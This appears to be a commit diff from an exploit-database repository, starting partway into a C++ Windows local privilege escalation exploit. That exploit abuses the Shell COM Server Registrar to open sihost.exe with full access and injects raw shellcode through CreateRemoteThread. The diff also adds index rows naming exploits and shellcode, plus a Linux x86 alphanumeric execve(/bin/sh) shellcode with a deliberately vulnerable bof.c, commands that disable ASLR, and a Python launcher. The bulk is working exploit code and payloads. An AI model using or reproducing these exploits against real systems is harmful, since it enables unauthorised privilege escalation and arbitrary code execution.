Hr = ComServerRegistrar.CoCreateInstance(
CLSID_CoreShellComServerRegistrar,
nullptr,
CLSCTX_LOCAL_SERVER
);
if(FAILED(Hr)) {
printf("You are probably not vulnerable (%08x) bailing out.", Hr);
return EXIT_FAILURE;
}
//
// We don't use the copy ctor here to avoid leaking the object as the returned
// stream already has its refcount bumped by `SHCreateMemStream`.
//
CComPtr<IStream> Stream;
Stream.Attach(SHCreateMemStream(nullptr, 0));
//
// Get the marshalled data for the `ICoreShellComServerRegistrar` interface, so
// that we can extract the PID of the COM server (sihost.exe) in this case.
// https://twitter.com/tiraniddo/status/1208073552282488833
//
Hr = CoMarshalInterface(
Stream,
__uuidof(ICoreShellComServerRegistrar),
ComServerRegistrar,
MSHCTX_LOCAL,
nullptr,
MSHLFLAGS_NORMAL
);
if(FAILED(Hr)) {
printf("Failed to marshal the interface (%08x) bailing out.", Hr);
return EXIT_FAILURE;
}
//
// Read the PID out of the blob now.
//
const LARGE_INTEGER Origin {};
Hr = Stream->Seek(Origin, STREAM_SEEK_SET, nullptr);
uint8_t Buffer[0x1000] {};
Hr = Stream->Read(Buffer, sizeof(Buffer), nullptr);
union {
Marshalled_t *Blob;
void *Raw;
} Ptr;
Ptr.Raw = Buffer;
const uint32_t SihostPid = Ptr.Blob->ServerPid;
//
// Ready to get a `PROCESS_ALL_ACCESS` handle to the server now!
//
HANDLE ProcessHandle;
Hr = ComServerRegistrar->OpenProcess(
PROCESS_ALL_ACCESS,
false,
SihostPid,
GetCurrentProcessId(),
&ProcessHandle
);
if(FAILED(Hr)) {
printf("Failed to OpenProcess (%08x) bailing out.", Hr);
return EXIT_FAILURE;
}
//
// Allocate executable memory in the target.
//
const auto ShellcodeAddress = LPTHREAD_START_ROUTINE(VirtualAllocEx(
ProcessHandle,
nullptr,
0x1000,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
));
if(ShellcodeAddress == nullptr) {
printf("Failed to VirtualAllocEx memory in the target process (%d) bailing out.", GetLastError());
return EXIT_FAILURE;
}
//
// This is a CreateProcess(calc) shellcode generated with scc, see payload.cc.
//
const uint8_t Shellcode[] {
0x48, 0x83, 0xc4, 0x08, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x08, 0x55, 0x48, 0x8b, 0xec,
0x48, 0x8d, 0x64, 0x24, 0xf0, 0x48, 0x8d, 0x05, 0x42, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0,
0x6a, 0x00, 0x8f, 0x45, 0xf8, 0x48, 0x8d, 0x05, 0x3a, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x08, 0x48,
0x8d, 0x55, 0xf0, 0xe8, 0x63, 0x01, 0x00, 0x00, 0xe8, 0xbf, 0x01, 0x00, 0x00, 0xc9, 0xc3, 0x53,
0x56, 0x57, 0x41, 0x54, 0x55, 0x48, 0x8b, 0xec, 0x6a, 0x60, 0x58, 0x65, 0x48, 0x8b, 0x00, 0x48,
0x8b, 0x40, 0x18, 0x48, 0x8b, 0x70, 0x10, 0x48, 0x8b, 0x46, 0x30, 0x48, 0x83, 0xf8, 0x00, 0x74,
0x13, 0xeb, 0x08, 0x4c, 0x8b, 0x06, 0x49, 0x8b, 0xf0, 0xeb, 0xec, 0x45, 0x33, 0xdb, 0x66, 0x45,
0x33, 0xd2, 0xeb, 0x09, 0x33, 0xc0, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x66, 0x8b, 0x46,
0x58, 0x66, 0x44, 0x3b, 0xd0, 0x72, 0x11, 0xeb, 0x3c, 0x66, 0x45, 0x8b, 0xc2, 0x66, 0x41, 0x83,
0xc0, 0x02, 0x66, 0x45, 0x8b, 0xd0, 0xeb, 0xe5, 0x45, 0x8b, 0xcb, 0x41, 0xc1, 0xe9, 0x0d, 0x41,
0x8b, 0xc3, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc8, 0x41, 0x8b, 0xc1, 0x4c, 0x8b, 0x46, 0x60, 0x45,
0x0f, 0xb7, 0xca, 0x4d, 0x03, 0xc1, 0x45, 0x8a, 0x00, 0x45, 0x0f, 0xbe, 0xc0, 0x41, 0x83, 0xf8,
0x61, 0x72, 0x15, 0xeb, 0x07, 0x41, 0x3b, 0xcb, 0x74, 0x16, 0xeb, 0x97, 0x41, 0x83, 0xe8, 0x20,
0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xb1, 0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xa9,
0x4c, 0x8b, 0x56, 0x30, 0x41, 0x8b, 0x42, 0x3c, 0x4d, 0x8b, 0xe2, 0x4c, 0x03, 0xe0, 0x41, 0x8b,
0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x33, 0xdb, 0x41,
0x8b, 0x41, 0x18, 0x44, 0x3b, 0xd8, 0x72, 0x0b, 0xe9, 0x56, 0xff, 0xff, 0xff, 0x41, 0x83, 0xc3,
0x01, 0xeb, 0xec, 0x41, 0x8b, 0x41, 0x20, 0x49, 0x8b, 0xda, 0x48, 0x03, 0xd8, 0x45, 0x8b, 0xc3,
0x48, 0x8b, 0xc3, 0x4a, 0x8d, 0x04, 0x80, 0x8b, 0x00, 0x49, 0x8b, 0xfa, 0x48, 0x03, 0xf8, 0x33,
0xc0, 0x48, 0x8b, 0xdf, 0x48, 0x83, 0xc7, 0x01, 0x44, 0x8a, 0x03, 0x41, 0x0f, 0xbe, 0xd8, 0x83,
0xfb, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x3b, 0xd0, 0x74, 0x17, 0xeb, 0xc1, 0x44, 0x8b, 0xc0, 0x41,
0xc1, 0xe8, 0x0d, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc0, 0x44, 0x03, 0xc3, 0x41, 0x8b, 0xc0, 0xeb,
0xd0, 0x41, 0x8b, 0x41, 0x1c, 0x49, 0x8b, 0xd2, 0x48, 0x03, 0xd0, 0x41, 0x8b, 0x41, 0x24, 0x4d,
0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x8b, 0xc3, 0x49, 0x8b, 0xc1, 0x4a, 0x8d, 0x04, 0x40, 0x66,
0x8b, 0x00, 0x0f, 0xb7, 0xc8, 0x48, 0x8b, 0xc2, 0x48, 0x8d, 0x04, 0x88, 0x8b, 0x00, 0x4c, 0x03,
0xd0, 0x49, 0x8b, 0xc2, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x53, 0x56, 0x57, 0x41, 0x54,
0x55, 0x48, 0x8b, 0xec, 0x48, 0x8b, 0xf1, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0x03, 0x48, 0x83, 0xf8,
0x00, 0x74, 0x0e, 0x48, 0x8b, 0xc6, 0x48, 0x83, 0xc6, 0x04, 0x44, 0x8b, 0x20, 0x33, 0xff, 0xeb,
0x07, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x8b, 0x06, 0x41, 0x8b, 0xcc, 0x8b, 0xd0, 0xe8,
0x6b, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0xd0, 0x48, 0x83, 0xfa, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x48,
0x83, 0xc3, 0x08, 0xeb, 0xc5, 0x48, 0x8b, 0x03, 0x48, 0x8b, 0xcf, 0x48, 0x83, 0xc7, 0x01, 0x48,
0x8d, 0x04, 0xc8, 0x48, 0x89, 0x10, 0x48, 0x83, 0xc6, 0x04, 0xeb, 0xcc, 0x57, 0x55, 0x48, 0x8b,
0xec, 0x48, 0x8d, 0xa4, 0x24, 0x78, 0xff, 0xff, 0xff, 0x48, 0x8d, 0xbd, 0x78, 0xff, 0xff, 0xff,
0x32, 0xc0, 0x6a, 0x68, 0x59, 0xf3, 0xaa, 0xc7, 0x85, 0x78, 0xff, 0xff, 0xff, 0x68, 0x00, 0x00,
0x00, 0x48, 0x8d, 0x05, 0x4a, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x10, 0x4c, 0x8d, 0x95, 0x78, 0xff,
0xff, 0xff, 0x48, 0x8d, 0x45, 0xe0, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x45, 0x33, 0xc9, 0x50, 0x41,
0x52, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x48, 0x8d, 0x64, 0x24, 0xe0, 0x48, 0x8d,
0x05, 0x09, 0x00, 0x00, 0x00, 0xff, 0x10, 0x48, 0x83, 0xc4, 0x50, 0xc9, 0x5f, 0xc3, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x17, 0xca, 0x2b, 0x6e, 0x72, 0xfe, 0xb3, 0x16, 0x00, 0x00,
0x00, 0x00, 0x63, 0x61, 0x6c, 0x63, 0x00
};
if(!WriteProcessMemory(
ProcessHandle,
ShellcodeAddress,
Shellcode,
sizeof(Shellcode),
nullptr
)) {
printf("Failed to WriteProcessMemory in the target process (%d) bailing out.", GetLastError());
//
// At least clean up the remote process D:
//
VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE);
return EXIT_FAILURE;
}
//
// Creating a remote thread on the shellcode now.
//
DWORD ThreadId;
HANDLE ThreadHandle = CreateRemoteThread(
ProcessHandle,
nullptr,
0,
ShellcodeAddress,
nullptr,
0,
&ThreadId
);
//
// Waiting for the thread to end..
//
WaitForSingleObject(ThreadHandle, INFINITE);
//
// All right, we are done here, let's clean up and exit.
//
VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE);
printf("Payload has been successfully injected in %d.", SihostPid);
return EXIT_SUCCESS;
}

32
files_exploits.csv
View file

@ -6627,6 +6627,26 @@ id,file,description,date,author,type,platform,port
47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows,
47848,exploits/windows/dos/47848.py,"NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows,
47853,exploits/windows/dos/47853.py,"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47855,exploits/windows/dos/47855.py,"SpotIE 2.9.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47856,exploits/windows/dos/47856.py,"Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47857,exploits/windows/dos/47857.py,"BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47859,exploits/windows/dos/47859.py,"ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47860,exploits/windows/dos/47860.py,"NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47861,exploits/windows/dos/47861.py,"Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47862,exploits/windows/dos/47862.py,"TextCrawler Pro3.1.1 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
47863,exploits/windows/dos/47863.py,"RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47864,exploits/windows/dos/47864.py,"Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47865,exploits/windows/dos/47865.py,"RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47866,exploits/windows/dos/47866.py,"NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47867,exploits/windows/dos/47867.py,"Office Product Key Finder 1.5.4 - Denial of Service (PoC)",2020-01-06,Gokkulraj,dos,windows,
47868,exploits/windows/dos/47868.py,"SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47869,exploits/windows/dos/47869.py,"SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47870,exploits/windows/dos/47870.py,"SpotIM 2.2 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows,
47871,exploits/windows/dos/47871.txt,"FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)",2020-01-06,FULLSHADE,dos,windows,
47873,exploits/windows/dos/47873.py,"Duplicate Cleaner Pro 4 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
47878,exploits/windows/dos/47878.txt,"Microsoft Outlook VCF cards - Denial of Service (PoC)",2020-01-06,hyp3rlinx,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10862,6 +10882,8 @@ id,file,description,date,author,type,platform,port
47830,exploits/freebsd/local/47830.sh,"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
47838,exploits/windows/local/47838.txt,"Microsoft Windows .Group File - Code Execution",2020-01-01,hyp3rlinx,local,windows,
47845,exploits/windows/local/47845.txt,"Plantronics Hub 3.13.2 - Local Privilege Escalation",2020-01-03,Markus,local,windows,
47852,exploits/windows/local/47852.txt,"Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path",2020-01-06,ZwX,local,windows,
47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42150,3 +42172,13 @@ id,file,description,date,author,type,platform,port
47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,
47843,exploits/php/webapps/47843.txt,"Online Course Registration 2.0 - Remote Code Execution",2020-01-03,"Metin Yunus Kandemir",webapps,php,
47844,exploits/php/webapps/47844.txt,"Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection",2020-01-03,"Hakan TAŞKÖPRÜ",webapps,php,
47846,exploits/php/webapps/47846.txt,"Dairy Farm Shop Management System 1.0 - 'username' SQL Injection",2020-01-06,"Chris Inzinga",webapps,php,
47847,exploits/php/webapps/47847.txt,"Complaint Management System 4.0 - 'cid' SQL injection",2020-01-06,FULLSHADE,webapps,php,
47850,exploits/hardware/webapps/47850.txt,"IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting",2020-01-06,"Ismail Tasdelen",webapps,hardware,
47851,exploits/php/webapps/47851.txt,"Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)",2020-01-06,"Ismail Tasdelen",webapps,php,
47854,exploits/php/webapps/47854.txt,"Hostel Management System 2.0 - 'id' SQL Injection",2020-01-06,FULLSHADE,webapps,php,
47858,exploits/php/webapps/47858.txt,"elaniin CMS 1.0 - Authentication Bypass",2020-01-06,riamloo,webapps,php,
47874,exploits/php/webapps/47874.txt,"Small CRM 2.0 - Authentication Bypass",2020-01-06,FULLSHADE,webapps,php,
47875,exploits/php/webapps/47875.txt,"Voyager 1.3.0 - Directory Traversal",2020-01-06,NgoAnhDuc,webapps,php,
47876,exploits/php/webapps/47876.txt,"Codoforum 4.8.3 - Persistent Cross-Site Scripting",2020-01-06,Prasanth,webapps,php,
47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -1010,3 +1010,4 @@ id,file,description,date,author,type,platform
47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux
47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux
47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux

1 id file description date author type platform
1010 47530 shellcodes/linux/47530.txt Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes) 2019-10-22 WangYihang shellcode linux
1011 47564 shellcodes/linux/47564.py Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) 2019-10-30 Daniel Ortiz shellcode linux
1012 47784 shellcodes/linux_x86-64/47784.txt Linux/x64 - Reverse TCP Stager Shellcode (188 bytes) 2019-12-17 Lee Mazzoleni shellcode linux_x86-64
1013 47877 shellcodes/linux/47877.c Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) 2020-01-06 bolonobolo shellcode linux

109
shellcodes/linux/47877.c Normal file
View file

@ -0,0 +1,109 @@
# Title: Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
# Date: 2019-12-31
# Shellcode Author: bolonobolo
# Tested on: Linux x86
######################## execve.asm ###############################
global _start
section .text
_start:
; int 0x80 ------------
push 0x30
pop eax
xor al, 0x30
push eax
pop edx
dec eax
xor ax, 0x4f73
xor ax, 0x3041
push eax
push edx
pop eax
;----------------------
push edx
push 0x68735858
pop eax
xor ax, 0x7777
push eax
push 0x30
pop eax
xor al, 0x30
xor eax, 0x6e696230
dec eax
push eax
; pushad/popad to place /bin/sh in EBX register
push esp
pop eax
push edx
push ecx
push ebx
push eax
push esp
push ebp
push esi
push edi
popad
push eax
pop ecx
push ebx
xor al, 0x4a
xor al, 0x41
######################## ASCII string ##########################
j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A
########################## bof.c ####################
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]){
char buffer[128];
strcpy(buffer, argv[1]);
return 0;
}
When you test it on new kernels remember to disable the
randomize_va_space and to compile the C program with execstack enabled
and the stack protector disabled
# bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
# sysctl -p
# gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g
bof.c -o bof
###################################################################
./bof `perl -e 'print "\x90"x48 .
"j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" .
"D"x16 . "\xff\xe4" . "\x79\xf7\xff\xbf"'`
The \x79\xf7\xff\xbf may change, you must find yourself an address in
the NOP befor the shellcode
#################### alpha.py ############################
#!/usr/bin/python
import os
print "[*] Loading NOP"
z = "\x90"*48
print "[*] Loading alphanumeric"
z += "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A"
print "[*] Loading syscall"
z += "D"*16
print "[*] Loading JMP and landing address"
z += "\xff\xe4\x79\xf7\xff\xbf"
print "[*] Popping the shell..."
os.system("./bof " + z)
##################################################################